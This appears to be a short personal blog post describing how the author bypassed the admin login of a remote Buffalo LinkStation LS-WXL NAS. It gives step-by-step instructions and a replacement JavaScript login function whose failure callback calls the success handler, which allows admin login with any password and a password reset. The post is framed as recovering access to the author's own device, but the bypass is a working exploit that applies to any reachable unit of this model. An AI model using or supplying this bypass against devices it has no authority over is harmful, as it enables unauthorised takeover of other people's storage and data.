Buffalo Linkstation (LS-WXL) – Admin hack
Long story short I needed access to this NAS and it was on the other side of the planet so a little creative coding came to the rescue.
With developer tools enabled (I used Chrome).
- Get to the login page
- Open dev tools sources tab
- Open login_utis.js under the ‘authentication’ folder
- Replace the login function with the following:
function login(f, lang) {if (login_lock != 0) {return;}login_lock = 1;
var uid = Ext.getCmp(‘user’);var uid_value = uid.getValue();var pwd = Ext.getCmp(‘password’);var pwd_value = pwd.getValue();
f.form.submit({url: ‘/dynamic.pl’,params: {bufaction: ‘verifyLogin’},waitTitle: S(‘Please Wait…’),waitMsg: S(‘Logging In…’),success: function(form, action){var decodedResponse= Ext.decode(action.response.responseText);var jsonData = decodedResponse.data;loginSuccess(f, action, uid_value, lang);},failure: function(form, action){loginSuccess(f, action, uid_value, lang);}});};
- Hit Ctrl+S (save the change)
- Login as admin with any password. I used admin/admin
- Reset the admin account with a new password.
Bad security in this case saved a lot of hassle.